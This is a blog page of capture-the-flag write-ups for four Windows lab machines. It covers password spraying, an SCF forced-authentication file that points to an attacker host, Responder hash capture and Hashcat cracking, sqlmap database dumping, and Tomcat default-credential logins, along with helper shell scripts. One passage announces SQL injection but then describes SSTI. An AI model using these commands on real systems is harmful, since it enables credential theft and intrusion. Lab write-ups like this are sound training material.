
4 posts tagged with "windows"


Cicada

· 4 min read

Task 1

What is the name of the non-default SMB share that is readable with guest access on Cicada?

Running smbclient -N -L //<target_ip> lists the shares on the target without supplying a password (-N), that is, over a null/guest session. Besides the default shares we see two non-default ones named DEV and HR.


Next, to see which of them is readable as a guest, we connect to each in turn with smbclient -N //<target_ip>/<share_name>. The one we can read is the HR share.


Task 2

What is the name of the file found in the HR share?

Seen in the previous task, from listing the contents of the HR share, the file name is "Notice from HR.txt".

Task 3

Which user account is still using the company default password?

To read the file we download it with get "Notice from HR.txt". It is a welcome message to a new hire that contains the company default password, but no username.


Next we enumerate domain users by brute-forcing RIDs over the null session with lookupsid.py anonymous@<target_ip> > lookupsid_output.txt (press Enter at the password prompt). To keep only the usernames we run grep '(SidTypeUser)' lookupsid_output.txt | awk -F '\\' '{print $2}' | cut -d' ' -f1 > users.txt, which drops groups and aliases, strips the DOMAIN\ prefix and discards the trailing type label. Finally, with the password from the notice, we spray it across the list with netexec smb <target_ip> -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'. One password against every account costs each account a single failed attempt, well below any lockout threshold, and the result shows it is still valid for michael.wrightson.
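The enumeration-then-spray step above, as an added shell example that is not part of the original write-up: it parses constructed lookupsid.py output (made-up RIDs, names and domain SID) into a user list with the same grep/awk/cut pipeline, additionally discarding machine accounts, and wraps the netexec spray so it fails loudly when netexec is not installed. The target IP and the users.txt path are placeholders.

```shell
#!/bin/sh
# Added example (not from the original write-up): turn lookupsid.py output
# into a clean user list and spray one candidate password safely.
set -eu

# Constructed sample of lookupsid.py output. RIDs, names and the domain SID
# are made up for illustration and are not taken from the target.
SAMPLE_LOOKUPSID='[*] Brute forcing SIDs at 10.10.10.10
[*] Domain SID is: S-1-5-21-111111111-222222222-333333333
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)'

# extract_users: keep only SidTypeUser rows (groups and aliases are useless
# for a spray), drop the "RID: DOMAIN\" prefix and the "(SidTypeUser)"
# suffix, and remove machine accounts (names ending in $), which never use
# an onboarding password. Reads stdin, writes one name per line.
extract_users() {
    grep '(SidTypeUser)' \
    | awk -F '\\' '{print $2}' \
    | cut -d' ' -f1 \
    | grep -v '\$$'
}

# spray_smb TARGET USERFILE PASSWORD: one password against every user.
# Each account receives exactly one failed attempt, so a lockout threshold
# of two or more is never reached; --continue-on-success keeps going after
# the first hit so that a password shared by several users is not missed.
spray_smb() {
    target=$1; userfile=$2; password=$3
    if ! command -v netexec >/dev/null 2>&1; then
        echo "netexec not installed; would run: netexec smb $target -u $userfile -p <password> --continue-on-success" >&2
        return 2
    fi
    netexec smb "$target" -u "$userfile" -p "$password" --continue-on-success
}

# Demo: "sh script.sh demo <target_ip>" writes users.txt from the sample
# and sprays the password recovered from the HR notice.
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_LOOKUPSID" | extract_users > users.txt
    spray_smb "${2:-<target_ip>}" users.txt 'Cicada$M6Corpb*@Lp#nZp!8'
fi
```

Feed real lookupsid.py output through extract_users instead of the sample; the machine-account filter matters on real domains, where RID brute-forcing returns every computer object alongside the users.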


Task 4

Which user has left their password in Active Directory metadata?

We dump the directory with ldapdomaindump -u cicada.htb\\michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' <target_ip>, which writes HTML, grep-friendly and JSON files for users, groups, computers and policy. Free-text attributes such as description are a classic place for administrators to leave credentials, so we search the user dump with grep -iE 'pass|key|desc|comment' domain_users.json, which prints every line containing one of those keywords.


Having found a password in a user's metadata, we check which accounts it is valid for with the users.txt list from the previous task: netexec smb <target_ip> -u users.txt -p 'aRt$Lp#7t*VQ!3'.


Driver

· 6 min read

Task 1

We're prompted for log on credentials when accessing the target over HTTP. What username is disclosed when looking at the HTTP response headers?

We fetch only the headers with curl -I <target_ip>; the realm string in the WWW-Authenticate header discloses the username admin.


Task 2

Weak passwords are all too common and this target is no exception. What is the password for this target's login?

Before reaching for any automated tool, we try the default, common password admin for the admin user, and it gets us in. The main page presents an MFP Firmware Update Center.


Task 3

There are several kinds of files that are commonly dropped into a file share to target other users who may browse to the share. If the user browses to the share, their host will try to authenticate to the attacker. What is the file extension that can be uploaded here to trigger that connection?

The answer is .scf, a Shell Command File. Its IconFile entry may point to a UNC path on a host we control; when a user merely browses to the folder containing the file, Explorer fetches the icon over SMB and authenticates with the user's Net-NTLM credentials, no click required. The file is typically dropped on a writable SMB share or, as here, submitted through a web upload that staff will later open in Explorer. For more detailed information visit MITRE ATT&CK (Forced Authentication, T1187).

Task 4

We've intercepted an Net-NTLMv2 hash with Responder. What is the mode in Hashcat required to crack this hash format?

When Responder intercepts a Net-NTLMv2 authentication, the captured string looks like:

USERNAME::DOMAIN:ServerChallenge:NTProofStr:Blob

This is the NetNTLMv2 layout that Hashcat mode 5600 expects, as listed in the official Hashcat documentation under Generic hash types (a NetNTLMv1 capture, by contrast, uses mode 5500).

Task 5

What is the tony user's password?

To solve this task, we start Responder with sudo responder -I tun0 and then upload a .scf file through the printer's firmware upload form, which places it on a file share; the SCF's icon reference will trigger an SMB authentication back to us. The file looks as follows:

[Shell]
Command=2
IconFile=\\<host_ip>\share\icon.ico
[Taskbar]
Command=ToggleDesktop

This works because, as the web page explains, uploads are reviewed manually: when a staff member opens the share folder in Explorer, Explorer tries to load the icon from our UNC path and sends that user's Net-NTLMv2 response, which Responder captures.


As noted in the previous task, this hash format is Hashcat mode 5600. We save the full hash string to a file called tony_hash.txt and run hashcat -m 5600 -a 0 tony_hash.txt /usr/share/wordlists/rockyou.txt; the password is cracked.
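The SCF lure from this task and the hash layout from Task 4, combined into one added shell example that is not from the original write-up: make_scf writes the file with CRLF line endings for Explorer, is_netntlmv2 checks a captured line against the mode 5600 layout, and extract_hashes pulls only well-formed hashes out of Responder output. The Responder sample is constructed (made-up hex that will not crack to anything, documentation-range IP), and the share and icon names in the UNC path are assumptions.

```shell
#!/bin/sh
# Added example (not from the original write-up): build the .scf lure and
# sanity-check captured lines before handing them to hashcat -m 5600.
set -eu

# make_scf ATTACKER_IP OUTFILE: write a Shell Command File whose IconFile
# is a UNC path on the attacker host. Explorer fetches the icon as soon as
# the folder containing the file is displayed, so the reviewer's machine
# authenticates to Responder listening on ATTACKER_IP without anyone
# opening the file. Share and icon names are arbitrary (assumed here).
make_scf() {
    printf '[Shell]\r\nCommand=2\r\nIconFile=\\\\%s\\share\\icon.ico\r\n[Taskbar]\r\nCommand=ToggleDesktop\r\n' \
        "$1" > "$2"
}

# is_netntlmv2 LINE: succeed when LINE has the layout hashcat mode 5600
# expects, USER::DOMAIN:ServerChallenge(16 hex):NTProofStr(32 hex):Blob(hex).
# A NetNTLMv1 line (mode 5500) or a truncated capture does not match.
is_netntlmv2() {
    printf '%s\n' "$1" \
    | grep -Eq '^[^:]+::[^:]*:[0-9A-Fa-f]{16}:[0-9A-Fa-f]{32}:[0-9A-Fa-f]+$'
}

# extract_hashes: read Responder console output (or Responder-Session.log)
# on stdin and print only the well-formed NetNTLMv2 hash strings, one per
# line, ready to be written to a hashcat input file.
extract_hashes() {
    sed -n 's/^.*NTLMv2-SSP Hash[[:space:]]*:[[:space:]]*//p' \
    | while IFS= read -r line; do
          if is_netntlmv2 "$line"; then printf '%s\n' "$line"; fi
      done
}

# Constructed Responder output; the challenge, NTProofStr and blob are made
# up hex that will not crack to anything. The second hash line is
# deliberately malformed to show it being filtered out.
SAMPLE_RESPONDER='[SMB] NTLMv2-SSP Client   : 192.0.2.10
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:1122334455667788:00112233445566778899aabbccddeeff:010100000000000000d0a2c1f1d9d701abcdef0123456789000000000200080044005200490056004500520000000000
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:notahash'

# Demo: "sh script.sh demo <attacker_ip>" writes the lure and a hash file.
if [ "${1:-}" = "demo" ]; then
    make_scf "${2:-<host_ip>}" lure.scf
    printf '%s\n' "$SAMPLE_RESPONDER" | extract_hashes > tony_hash.txt
    echo "next: hashcat -m 5600 -a 0 tony_hash.txt /usr/share/wordlists/rockyou.txt"
fi
```

Pipe the real Responder output into extract_hashes rather than copying a hash by hand: a line that wrapped or lost characters in the terminal fails the layout check here instead of producing a silent "no hashes loaded" from hashcat.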

Task 6

Submit the flag located on the tony user's desktop.

We first list the shares on the target's SMB (Microsoft-DS) service with smbclient -L //<target_ip> -U 'tony', using tony's password from the previous task.


Then we try connecting directly to the default C$ share with smbclient //<target_ip>/C$ -U 'tony', which returns access denied. We then check tony's permissions on every share with crackmapexec smb <target_ip> -u tony -p 'liltony' --shares.


This confirms that the user has no useful share access, but the output also reports Windows 10 Enterprise. WinRM ships with Windows 10 and is frequently enabled on domain-joined machines for remote administration, so it is worth checking whether tony can log on over it:

crackmapexec winrm <target_ip> -u tony -p liltony


Since the service is enabled, we get a shell with evil-winrm -i <target_ip> -u tony -p liltony. Navigating to tony's Desktop we read the flag with cat user.txt.

Good Games

· 5 min read

Task 1

Submit User Flag

We use nmap to find the services on the target and see an Apache web server running on port 80.

nmap -sV target_ip


Opening the site in a browser, we find a login page, and we will try to bypass its authentication with SQL injection.

Server-Side Template Injection (SSTI) vulnerability arises when an application incorporates user-supplied input directly into its server-side templates without proper sanitization or validation. Template engines, which combine templates with dynamic data to generate web pages, can be exploited through SSTI attacks.

To find forms that are candidates for sql injection run

sqlmap -u "http://10.129.51.14/" --forms --crawl=2 --dbms=mysql

--crawl=CRAWLDEPTH: crawls the website starting from the target url

We find a total of 8 targets. One of them is the login form; sqlmap auto-filled the blank fields, tried multiple techniques and identified that the email field is vulnerable to time-based blind SQL injection.


After confirming the vulnerability we want to enumerate the database and find the table storing the usernames and passwords to get the user flag.

We now point sqlmap directly at the login endpoint, marking the injectable email parameter with * in the POST body, and retrieve the database names.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" --dbs

We find 2 databases, information_schema and main.

Next, we will list the tables from each.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" -D <database_name> --tables

Starting with the database main, we find 3 tables: blog, blog_comments and user. We investigate user first.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" -D main -T user --columns

There we find 4 columns in total, including one named email and one named password, which should hold the credentials we need.


We then run the following command to retrieve that information.

sqlmap -u "http://10.129.51.14/login" --data="email=*&password=test123" -D main -T user -C email,password --dump

The dump gives us the email and a password hash rather than a plaintext password, so we run the hash through a hash cracker and then log in with the email and the recovered plaintext.
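The hash-cracking step, as an added shell example that is not from the original write-up and does not know which hash type the Good Games user table actually uses: it guesses the type from the digest length and, for the unsalted-MD5 case, runs a dictionary attack with coreutils only. The demo hash is the MD5 of the word password, and the three-word list is a constructed stand-in for rockyou.txt.

```shell
#!/bin/sh
# Added example (not from the original write-up): identify the hash type of
# the dumped password column and crack it offline with coreutils only.
set -eu

# guess_hash_type HASH: length/charset heuristic for unsalted hex digests.
# It only narrows which hashcat mode to try; confirm with hashid or by
# cracking. Salted schemes such as bcrypt ($2b$...) report "not-hex".
guess_hash_type() {
    if ! printf '%s' "$1" | grep -Eq '^[0-9a-fA-F]+$'; then
        echo "not-hex"
        return 1
    fi
    case ${#1} in
        32) echo "md5 (hashcat -m 0)" ;;
        40) echo "sha1 (hashcat -m 100)" ;;
        64) echo "sha256 (hashcat -m 1400)" ;;
        *)  echo "unknown"; return 1 ;;
    esac
}

# crack_md5 HASH WORDLIST: dictionary attack against one unsalted MD5
# hash. Prints the matching word and returns 0, or returns 1 once the
# wordlist is exhausted. For real work use hashcat -m 0 -a 0 HASH WORDLIST;
# this loop exists to show what the tool is doing.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    while IFS= read -r word || [ -n "$word" ]; do
        digest=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$digest" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Demo: the hash is MD5("password"), constructed here; the wordlist is a
# three-word stand-in for rockyou.txt.
if [ "${1:-}" = "demo" ]; then
    wl=$(mktemp)
    printf 'letmein\nadmin\npassword\n' > "$wl"
    guess_hash_type 5f4dcc3b5aa765d61d8327deb882cf99
    crack_md5 5f4dcc3b5aa765d61d8327deb882cf99 "$wl"
    rm -f "$wl"
fi
```

If guess_hash_type reports not-hex or unknown, look at the value before picking a mode: a leading $ usually marks a salted, iterated format that no length rule identifies and that rockyou will take far longer to exhaust.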

Now that we are logged in as admin, a gear icon at the top right redirects us to internal-administration.goodgames.htb. We need to add an entry to /etc/hosts pointing this hostname at the target's IP; note that editing the hosts file requires root privileges.

Jerry

· 4 min read

Task 1

Which TCP port is open on the remote host?

Run nmap to scan all TCP ports (the SYN scan -sS needs raw sockets, so run it as root):

nmap -sS -p- <target_ip>


The scan reveals port 8080 as open; nmap labels the service http-proxy, which is only its default guess for that port.

Task 2

Which web server is running on the remote host? Looking for two words.

To identify the web server, we add service and version detection to the nmap scan of that port.

nmap -sV -p 8080 <target_ip>


We see on the version that the web server is Apache Tomcat.

Task 3

Which relative path on the webserver leads to the Web Application Manager?

Open a browser and navigate to the ip address of the target. Remember to specify the port to be 8080.

Look over the page to see whether anything is useful. Under Managing Tomcat there is a link to the manager webapp, which is presumably what the question calls the Web Application Manager. The page states that, for security, access is restricted and users are defined in $CATALINA_HOME/conf/tomcat-users.xml. That is worth remembering, but let's first see where the link goes: clicking it redirects to /manager/html, where we are asked for credentials. Keep that prompt in mind; for now we have the relative path the question asks for.

Task 4

What is the valid username and password combination for authenticating into the Tomcat Web Application Manager? Give the answer in the format of username:password

In the previous step we navigated to /manager/html and were asked for credentials. After the failed authentication, the error page shows an example of how to add a user with the role needed to access the manager application. We try those example credentials at the login prompt, and they work!


Another approach is to use the Metasploit Framework. Run msfconsole and then search tomcat. Among the results is the auxiliary module auxiliary/scanner/http/tomcat_mgr_login, which attempts to log in with a built-in list of default username and password pairs. Select it with use <number_of_option> and view the settings it requires with show options.

Set the target with set RHOSTS <target_ip> and set RPORT <target_port>, then type run. One login attempt succeeds, and it uses the same credentials we found before.
